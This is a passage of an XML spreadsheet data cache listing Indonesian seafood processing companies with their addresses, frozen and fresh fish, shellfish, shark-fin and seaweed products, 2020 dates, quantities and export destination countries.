    <n v="27"/>
    <s v="Tuna Beku"/>
    <d v="2020-02-25T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Japan, United Kingdom, United States"/>
  </r>
  <r>
    <n v="19666"/>
    <x v="60"/>
    <s v="KSU ADI JAYA LESTARI"/>
    <s v="Jl. Pembangunan No.5, Komplek PPI Sodohoa, Kel. Sanua, Kec. Kendari Barat, Kota Kendari&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Kerang Beku"/>
    <d v="2020-02-25T00:00:00"/>
    <n v="40000"/>
    <m/>
    <s v="China, Japan, United Kingdom, United States"/>
  </r>
  <r>
    <n v="19725"/>
    <x v="132"/>
    <s v="PT. ANUGERAH KERAMAT INDAH"/>
    <s v="Jl. Kol Yos Sudarso Lingkungan V, Kel. Sei Merbau, Kec. Teluk Nibung, Kota Tanjung Balai&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Demersal Beku (Mata Besar, Malong, Kambing-kambing, Biji Nangka, Layur, Bawal, Samge, Ayam-ayam)"/>
    <d v="2020-03-24T00:00:00"/>
    <n v="200000"/>
    <m/>
    <s v="China, Hong Kong, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="20257"/>
    <x v="53"/>
    <s v="PT. UNITED OCEANS WORLDWIDE"/>
    <s v="Jl. Semampar No.1 Komplek Workshop PHPT Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Barakuda, Tongkol, Cobia, Deho, Kembung, Lemadang, Marlin, Gindara, Salem, Layaran, Cakalang, Tenggiri, Todak)"/>
    <d v="2020-05-08T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="Australia, China, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="20370"/>
    <x v="133"/>
    <s v="PT. HOLI MINA JAYA"/>
    <s v="Jl. Raya Semarang-Tuban, Kel. Sendangmulyo, Kec. Sluke, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Tuna Segar"/>
    <d v="2020-08-05T00:00:00"/>
    <n v="200"/>
    <m/>
    <s v="China, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="20387"/>
    <x v="104"/>
    <s v="PT. ERA MANDIRI CEMERLANG TBK"/>
    <s v="Ruko Lodan Center, Jl. Lodan Raya No.2 Blok F No.2-7, Kel. Ancol, Kec. Pademangan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Cobia, Kembung, Lemadang, Marlin, Gindara, Layaran, Cakalang, Tenggiri, Pedang)"/>
    <d v="2020-04-28T00:00:00"/>
    <n v="200000"/>
    <m/>
    <s v="France, Germany, Netherlands, United States"/>
  </r>
  <r>
    <n v="20775"/>
    <x v="134"/>
    <s v="PT. STARFOOD INTERNATIONAL"/>
    <s v="Jl. Raya Deandles Km 76, Kel. Kandang Semangkon, Kec. Paciran, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Swanggi, Malong, Kuniran, Kerapu, Layur, Rejung, Kakap, Kuro)"/>
    <d v="2020-06-05T00:00:00"/>
    <n v="3000000"/>
    <m/>
    <s v="China, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="20776"/>
    <x v="134"/>
    <s v="PT. STARFOOD INTERNATIONAL"/>
    <s v="Jl. Raya Deandles Km 76, Kel. Kandang Semangkon, Kec. Paciran, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-06-05T00:00:00"/>
    <n v="250000"/>
    <m/>
    <s v="China, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="20777"/>
    <x v="134"/>
    <s v="PT. STARFOOD INTERNATIONAL"/>
    <s v="Jl. Raya Deandles Km 76, Kel. Kandang Semangkon, Kec. Paciran, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Surimi Beku"/>
    <d v="2020-06-05T00:00:00"/>
    <n v="3000000"/>
    <m/>
    <s v="China, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="20998"/>
    <x v="56"/>
    <s v="PT. MINA JAYA WYSIA"/>
    <s v="Pergudangan Bandara Mas Blok T 11, Kel. Kedaung Wetan, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Demersal Segar (Gulama, Manyung, Kerapu, Layur, Bawal, Kakap, Baronang, Kurisi, Ekor Kuning, Barramundi)"/>
    <d v="2020-07-02T00:00:00"/>
    <n v="500"/>
    <m/>
    <s v="China, Hong Kong, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="21000"/>
    <x v="56"/>
    <s v="PT. MINA JAYA WYSIA"/>
    <s v="Pergudangan Bandara Mas Blok T 11, Kel. Kedaung Wetan, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cephalopoda Segar (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-07-02T00:00:00"/>
    <n v="500"/>
    <m/>
    <s v="China, Hong Kong, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="21002"/>
    <x v="56"/>
    <s v="PT. MINA JAYA WYSIA"/>
    <s v="Pergudangan Bandara Mas Blok T 11, Kel. Kedaung Wetan, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Pelagis Segar (Tongkol, Cakalang, Tenggiri)"/>
    <d v="2020-07-02T00:00:00"/>
    <n v="500"/>
    <m/>
    <s v="China, Hong Kong, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="21003"/>
    <x v="56"/>
    <s v="PT. MINA JAYA WYSIA"/>
    <s v="Pergudangan Bandara Mas Blok T 11, Kel. Kedaung Wetan, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Telur Ikan Terbang Kering"/>
    <d v="2020-07-02T00:00:00"/>
    <n v="500"/>
    <m/>
    <s v="China, Hong Kong, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="21005"/>
    <x v="56"/>
    <s v="PT. MINA JAYA WYSIA"/>
    <s v="Pergudangan Bandara Mas Blok T 11, Kel. Kedaung Wetan, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Sirip Hiu Kering"/>
    <d v="2020-07-02T00:00:00"/>
    <n v="500"/>
    <m/>
    <s v="China, Hong Kong, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="21066"/>
    <x v="135"/>
    <s v="PT. PUGUH BACHTI KARSA"/>
    <s v="Pergudangan Emerald Green D.8, Bukit Semarang Baru (BSB), Kel. Jatibarang, Kec. Mijen, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-07-27T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Malaysia, Saudi Arabia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="21067"/>
    <x v="135"/>
    <s v="PT. PUGUH BACHTI KARSA"/>
    <s v="Pergudangan Emerald Green D.8, Bukit Semarang Baru (BSB), Kel. Jatibarang, Kec. Mijen, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Scallop Beku"/>
    <d v="2020-07-27T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Malaysia, Saudi Arabia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="21068"/>
    <x v="135"/>
    <s v="PT. PUGUH BACHTI KARSA"/>
    <s v="Pergudangan Emerald Green D.8, Bukit Semarang Baru (BSB), Kel. Jatibarang, Kec. Mijen, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Demersal Beku (Kerapu, Sebelah, Jenaha, Bawal, Kakap, Pari, Kuro, Kurisi)"/>
    <d v="2020-07-27T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Malaysia, Saudi Arabia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="21069"/>
    <x v="135"/>
    <s v="PT. PUGUH BACHTI KARSA"/>
    <s v="Pergudangan Emerald Green D.8, Bukit Semarang Baru (BSB), Kel. Jatibarang, Kec. Mijen, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Udang Beku"/>
    <d v="2020-07-27T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Malaysia, Saudi Arabia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="21070"/>
    <x v="135"/>
    <s v="PT. PUGUH BACHTI KARSA"/>
    <s v="Pergudangan Emerald Green D.8, Bukit Semarang Baru (BSB), Kel. Jatibarang, Kec. Mijen, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Rajungan Beku"/>
    <d v="2020-07-27T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Malaysia, Saudi Arabia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="21071"/>
    <x v="135"/>
    <s v="PT. PUGUH BACHTI KARSA"/>
    <s v="Pergudangan Emerald Green D.8, Bukit Semarang Baru (BSB), Kel. Jatibarang, Kec. Mijen, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Kepiting Beku"/>
    <d v="2020-07-27T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Malaysia, Saudi Arabia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="21072"/>
    <x v="135"/>
    <s v="PT. PUGUH BACHTI KARSA"/>
    <s v="Pergudangan Emerald Green D.8, Bukit Semarang Baru (BSB), Kel. Jatibarang, Kec. Mijen, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Tuna Beku"/>
    <d v="2020-07-27T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Malaysia, Saudi Arabia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="21073"/>
    <x v="135"/>
    <s v="PT. PUGUH BACHTI KARSA"/>
    <s v="Pergudangan Emerald Green D.8, Bukit Semarang Baru (BSB), Kel. Jatibarang, Kec. Mijen, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Pelagis Beku (Layur, Tenggiri)"/>
    <d v="2020-07-27T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Malaysia, Saudi Arabia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="21074"/>
    <x v="135"/>
    <s v="PT. PUGUH BACHTI KARSA"/>
    <s v="Pergudangan Emerald Green D.8, Bukit Semarang Baru (BSB), Kel. Jatibarang, Kec. Mijen, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Keong Beku"/>
    <d v="2020-07-27T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Malaysia, Saudi Arabia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="21248"/>
    <x v="135"/>
    <s v="PT. PUGUH BACHTI KARSA"/>
    <s v="Pergudangan Emerald Green D.8, Bukit Semarang Baru (BSB), Kel. Jatibarang, Kec. Mijen, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Rajungan Segar"/>
    <d v="2020-07-27T00:00:00"/>
    <n v="25734"/>
    <m/>
    <s v="Malaysia, Saudi Arabia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="21323"/>
    <x v="109"/>
    <s v="PT. BUMI MENARA INTERNUSA"/>
    <s v="Jl. Margomulyo 4E, Kel. Tandes Lor, Kec. Tandes, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Gurita, Cumi-cumi, Sotong)"/>
    <d v="2020-08-05T00:00:00"/>
    <n v="745000"/>
    <m/>
    <s v="China, Germany, Italy, Japan, United States"/>
  </r>
  <r>
    <n v="20034"/>
    <x v="136"/>
    <s v="PT. INDOFLORA CIPTA MANDIRI"/>
    <s v="Jl. Pandanlandung No.34 A, Kel. Pandanlandung, Kec. Wagir, Kabupaten Malang&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tepung Jelly Rumput Laut, Tepung Puding Rumput Laut"/>
    <d v="2020-05-01T00:00:00"/>
    <n v="60000"/>
    <s v="Kota Bandung, Kabupaten Malang, Kabupaten Pasuruan, Kota Malang, Kota Pasuruan, Kota Surabaya, Kota Makassar"/>
    <s v="India, Philippines, United States, Uruguay"/>
  </r>
  <r>
    <n v="20032"/>
    <x v="136"/>
    <s v="PT. INDOFLORA CIPTA MANDIRI"/>
    <s v="Jl. Pandanlandung No.34 A, Kel. Pandanlandung, Kec. Wagir, Kabupaten Malang&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Refined Carrageenan"/>
    <d v="2020-05-01T00:00:00"/>
    <n v="120000"/>
    <s v="Kota Bandung, Kota Cirebon, Kabupaten Malang, Kabupaten Pasuruan, Kota Malang, Kota Surabaya, Kota Makassar"/>
    <s v="India, Philippines, United States, Uruguay"/>
  </r>
  <r>
    <n v="20033"/>
    <x v="136"/>
    <s v="PT. INDOFLORA CIPTA MANDIRI"/>
    <s v="Jl. Pandanlandung No.34 A, Kel. Pandanlandung, Kec. Wagir, Kabupaten Malang&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Semi Refined Carrageenan"/>
    <d v="2020-05-01T00:00:00"/>
    <n v="12000"/>
    <s v="Kota Bandung, Kabupaten Malang, Kota Malang, Kota Pasuruan, Kota Surabaya, Kota Makassar"/>
    <s v="India, Philippines, United States, Uruguay"/>
  </r>
  <r>
    <n v="20552"/>
    <x v="96"/>
    <s v="PT. BERKAH ANEKA LAUT"/>
    <s v="Jl. Lingkar Utara Mangunharjo, Kel. Mangunharjo, Kec. Mayangan, Kota Probolinggo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Air Tawar Beku (Lele, Belut, Gurami, Bandeng, Patin, Bawal, Nila)"/>
    <d v="2020-08-24T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Utara, Kabupaten Demak, Kabupaten Banyuwangi, Kota Surabaya"/>
    <s v="China, Malaysia, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="20551"/>
    <x v="96"/>
    <s v="PT. BERKAH ANEKA LAUT"/>
    <s v="Jl. Lingkar Utara Mangunharjo, Kel. Mangunharjo, Kec. Mayangan, Kota Probolinggo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-08-24T00:00:00"/>
    <n v="3000000"/>
    <s v="Kota Jakarta Barat, Kabupaten Rembang, Kabupaten Demak, Kota Surabaya"/>
    <s v="China, Malaysia, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="20721"/>
    <x v="39"/>
    <s v="PT. UNIMITRA ANDALAN SEJATI"/>
    <s v="Jl. Tekno I Kawasan Industri Jababeka 3C No.3B, Kel. Pasir Gombong, Kec. Cikarang Utara, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Kerang Beku"/>
    <d v="2020-06-18T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara, Kota Bekasi, Kota Tangerang"/>
    <s v="Philippines, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="19407"/>
    <x v="32"/>
    <s v="CV. INDOTROPIC FISHERY"/>
    <s v="Jl. Raya Km 9, Kel. Biak, Kec. Luwuk Utara, Kabupaten Banggai&lt;br&gt;Sulawesi Tengah"/>
    <n v="28"/>
    <s v="Ikan Demersal Beku (Kerapu Bintik, Lencam, Kakap)"/>
    <d v="2020-02-27T00:00:00"/>
    <n v="374566"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya"/>
    <s v="Australia, France, Thailand, United States"/>
  </r>
  <r>
    <n v="20363"/>
    <x v="120"/>
    <s v="PT. MULTI SARI MAKASSAR"/>
    <s v="Jl. Kima 14 Kav SS 12, Kel. Bira, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-03-16T00:00:00"/>
    <n v="90000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Australia, Italy, Mauritius, United States"/>
  </r>
  <r>
    <n v="20365"/>
    <x v="120"/>
    <s v="PT. MULTI SARI MAKASSAR"/>
    <s v="Jl. Kima 14 Kav SS 12, Kel. Bira, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Cephalopoda Segar (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-03-16T00:00:00"/>
    <n v="30000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Australia, Italy, Mauritius, United States"/>
  </r>
  <r>
    <n v="20553"/>
    <x v="96"/>
    <s v="PT. BERKAH ANEKA LAUT"/>
    <s v="Jl. Lingkar Utara Mangunharjo, Kel. Mangunharjo, Kec. Mayangan, Kota Probolinggo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Sirip Hiu Beku"/>
    <d v="2020-08-24T00:00:00"/>
    <n v="1000000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Malaysia, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="20554"/>
    <x v="96"/>
    <s v="PT. BERKAH ANEKA LAUT"/>
    <s v="Jl. Lingkar Utara Mangunharjo, Kel. Mangunharjo, Kec. Mayangan, Kota Probolinggo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Sirip Hiu Kering"/>
    <d v="2020-08-24T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Malaysia, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="20907"/>
    <x v="96"/>
    <s v="PT. BERKAH ANEKA LAUT"/>
    <s v="Jl. Lingkar Utara Mangunharjo , Kel. Mangunharjo, Kec. Mayangan, Kota Probolinggo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Gelembung Ikan Kering"/>
    <d v="2020-08-24T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China, Malaysia, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="20524"/>
    <x v="110"/>
    <s v="PT. CILACAP SAMUDERA FISHING INDUSTRY"/>
    <s v="Kawasan Pelabuhan PPS Nizam Zachman Blok K 7D, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Hiu Beku"/>
    <d v="2020-05-01T00:00:00"/>
    <n v="85000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="20531"/>
    <x v="137"/>
    <s v="PT. OSEANIK NUSA GLOBAL"/>
    <s v="Jl. Husein Sastranegara Komplek Pergudangan Nusa Indah Room CS-4A Blok B/37 RT 004 RW 003, Kel. Jurumundi, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cephalopoda Beku (Sotong, Cumi-cumi)"/>
    <d v="2020-06-29T00:00:00"/>
    <n v="75000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="19717"/>
    <x v="50"/>
    <s v="PT. MARINDO MAKMUR USAHA JAYA"/>
    <s v="Jl. Muncul Industri II, Kel. Gedangan, Kec. Gedangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Segar (Barramundi, Lencam, Anggoli, Kerapu, Jenaha, Malabar, Kakatua, Kakap)"/>
    <d v="2020-02-24T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Denpasar"/>
    <s v="Australia, Japan, Singapore, United States"/>
  </r>
  <r>
    <n v="19463"/>
    <x v="138"/>
    <s v="PT. HASIL ALAM TANI NELAYAN INDONESIA"/>
    <s v="Jl. Hatni No.200 Km 60,8, Kel. Tlogosadang, Kec. Paciran, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Swanggi, Gulama, Sebelah, Senangin, Biji Nangka, Kuniran, Kerapu, Gerot-gerot, Layur, Beloso, Kapas-kapas, Kakap, Kuro, Lidah, Jaket, Bawal)"/>
    <d v="2020-06-22T00:00:00"/>
    <n v="150000"/>
    <m/>
    <s v="China, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="19464"/>
    <x v="138"/>
    <s v="PT. HASIL ALAM TANI NELAYAN INDONESIA"/>
    <s v="Jl. Hatni No.200 Km 60,8, Kel. Tlogosadang, Kec. Paciran, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kembung, Lemadang, Marlin, Talang-talang, Layang, Cakalang, Tenggiri, Pedang, Selar, Lemuru, Cobia)"/>
    <d v="2020-06-22T00:00:00"/>
    <n v="2000"/>
    <m/>
    <s v="China, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="19465"/>
    <x v="138"/>
    <s v="PT. HASIL ALAM TANI NELAYAN INDONESIA"/>
    <s v="Jl. Hatni No.200 Km 60,8, Kel. Tlogosadang, Kec. Paciran, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-06-22T00:00:00"/>
    <n v="60000"/>
    <m/>
    <s v="China, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="19466"/>
    <x v="138"/>
    <s v="PT. HASIL ALAM TANI NELAYAN INDONESIA"/>
    <s v="Jl. Hatni No.200 Km 60,8, Kel. Tlogosadang, Kec. Paciran, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Asin Beku"/>
    <d v="2020-06-22T00:00:00"/>
    <n v="75000"/>
    <m/>
    <s v="China, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="19726"/>
    <x v="132"/>
    <s v="PT. ANUGERAH KERAMAT INDAH"/>
    <s v="Jl. Kol Yos Sudarso Lingkungan V, Kel. Sei Merbau, Kec. Teluk Nibung, Kota Tanjung Balai&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Beku (Tenggiri)"/>
    <d v="2020-03-24T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="20050"/>
    <x v="43"/>
    <s v="PT. MAKMUR JAYA SEJAHTERA"/>
    <s v="Jl. Muara Baru Ujung Blok J No.8, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Barakuda, Lemadang, Marlin, Meka, Opah, Gindara, Layaran, Cakalang, Tenggiri)"/>
    <d v="2020-04-07T00:00:00"/>
    <n v="34913"/>
    <m/>
    <s v="Japan, United Arab Emirates, United States"/>
  </r>
  <r>
    <n v="20182"/>
    <x v="139"/>
    <s v="PT. DHARMINDO SAMUDRA ABADI"/>
    <s v="Jl. Raya Sarang-Tuban No.89, Kel. Temperek, Kec. Sarang, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Cephalopoda Beku (Sotong, Cumi-cumi)"/>
    <d v="2021-01-21T00:00:00"/>
    <n v="72000"/>
    <m/>
    <s v="China, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="21146"/>
    <x v="73"/>
    <s v="PT. MANDIRI SUKSES JAYA PERKASA"/>
    <s v="Jl. Pusat Pemasaran Ikan No.74,75,76 Pelabuhan Muara Baru, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Bandeng Beku"/>
    <d v="2020-09-21T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Japan, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="19986"/>
    <x v="140"/>
    <s v="CV, MAROS TIMUR JAYA"/>
    <s v="Jl, Poros Makassar - Maros, Dusun Bulutanae, Kel, Marumpa, Kec, Marusu, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Segar (Barakuda, Tenggiri, Pedang)"/>
    <d v="2020-03-30T00:00:00"/>
    <n v="46266422"/>
    <s v="Kota Batam, Kota Jakarta Pusat, Kota Surabaya, Kota Denpasar"/>
    <s v="China, Hong Kong, Saudi Arabia, Singapore"/>
  </r>
  <r>
    <n v="19987"/>
    <x v="140"/>
    <s v="CV, MAROS TIMUR JAYA"/>
    <s v="Jl, Poros Makassar - Maros, Dusun Bulutanae, Kel, Marumpa, Kec, Marusu, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Segar (Barramundi, Lencam, Kerapu, Kakatua, Pepetek, Kakap, Kurisi)"/>
    <d v="2020-03-30T00:00:00"/>
    <n v="31751466"/>
    <s v="Kota Batam, Kota Jakarta Pusat, Kota Surabaya, Kota Denpasar"/>
    <s v="China, Hong Kong, Saudi Arabia, Singapore"/>
  </r>
  <r>
    <n v="21141"/>
    <x v="141"/>
    <s v="CV. BENGGAWI SUKSES SELALU"/>
    <s v="Desa Gonggong, Kec. Banggai Tengah, Kabupaten Banggai Laut&lt;br&gt;Sulawesi Tengah"/>
    <n v="28"/>
    <s v="Ikan Demersal Beku (Lencam, Kerapu, Kakatua, Kakap, Kaci-kaci)"/>
    <d v="2020-11-05T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya, Kota Denpasar"/>
    <s v="China, Malaysia, Singapore, United States"/>
  </r>
  <r>
    <n v="21142"/>
    <x v="141"/>
    <s v="CV. BENGGAWI SUKSES SELALU"/>
    <s v="Desa Gonggong, Kec. Banggai Tengah, Kabupaten Banggai Laut&lt;br&gt;Sulawesi Tengah"/>
    <n v="28"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Cakalang, Tenggiri)"/>
    <d v="2020-11-05T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya, Kota Denpasar"/>
    <s v="China, Malaysia, Singapore, United States"/>
  </r>
  <r>
    <n v="21143"/>
    <x v="141"/>
    <s v="CV. BENGGAWI SUKSES SELALU"/>
    <s v="Desa Gonggong, Kec. Banggai Tengah, Kabupaten Banggai Laut&lt;br&gt;Sulawesi Tengah"/>
    <n v="28"/>
    <s v="Tuna Beku"/>
    <d v="2020-11-05T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya, Kota Denpasar"/>
    <s v="China, Malaysia, Singapore, United States"/>
  </r>
  <r>
    <n v="21144"/>
    <x v="141"/>
    <s v="CV. BENGGAWI SUKSES SELALU"/>
    <s v="Desa Gonggong, Kec. Banggai Tengah, Kabupaten Banggai Laut&lt;br&gt;Sulawesi Tengah"/>
    <n v="28"/>
    <s v="Udang Mentah Beku"/>
    <d v="2020-11-05T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya, Kota Denpasar"/>
    <s v="China, Malaysia, Singapore, United States"/>
  </r>
  <r>
    <n v="19385"/>
    <x v="142"/>
    <s v="CV. LINTAS SAMUDERA MANDIRI"/>
    <s v="Kompleks PPI Lonrae Kav 3, Kel. Lonrae, Kec. Tanete Riattang Timur, Kabupaten Bone&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Bandeng Beku"/>
    <d v="2020-01-15T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Selatan, Kota Surabaya"/>
    <s v="China, Malaysia, Singapore, United States"/>
  </r>
  <r>
    <n v="21140"/>
    <x v="141"/>
    <s v="CV. BENGGAWI SUKSES SELALU"/>
    <s v="Desa Gonggong, Kec. Banggai Tengah, Kabupaten Banggai Laut&lt;br&gt;Sulawesi Tengah"/>
    <n v="28"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-11-05T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya"/>
    <s v="China, Malaysia, Singapore, United States"/>
  </r>
  <r>
    <n v="19304"/>
    <x v="112"/>
    <s v="PT. PERIKANAN NUSANTARA (PERSERO) UNIT MIMIKA"/>
    <s v="Jl. Kawasan Industri Perikanan Poumako, Kel. Poumako, Kec. Mimika, Kabupaten Mimika&lt;br&gt;Papua"/>
    <n v="34"/>
    <s v="Tuna Loin Beku"/>
    <d v="2020-01-29T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Singapore, United States, Viet Nam"/>
  </r>
  <r>
    <n v="19305"/>
    <x v="112"/>
    <s v="PT. PERIKANAN NUSANTARA (PERSERO) UNIT MIMIKA"/>
    <s v="Jl. Kawasan Industri Perikanan Poumako, Kel. Poumako, Kec. Mimika, Kabupaten Mimika&lt;br&gt;Papua"/>
    <n v="34"/>
    <s v="Tuna Loin Segar"/>
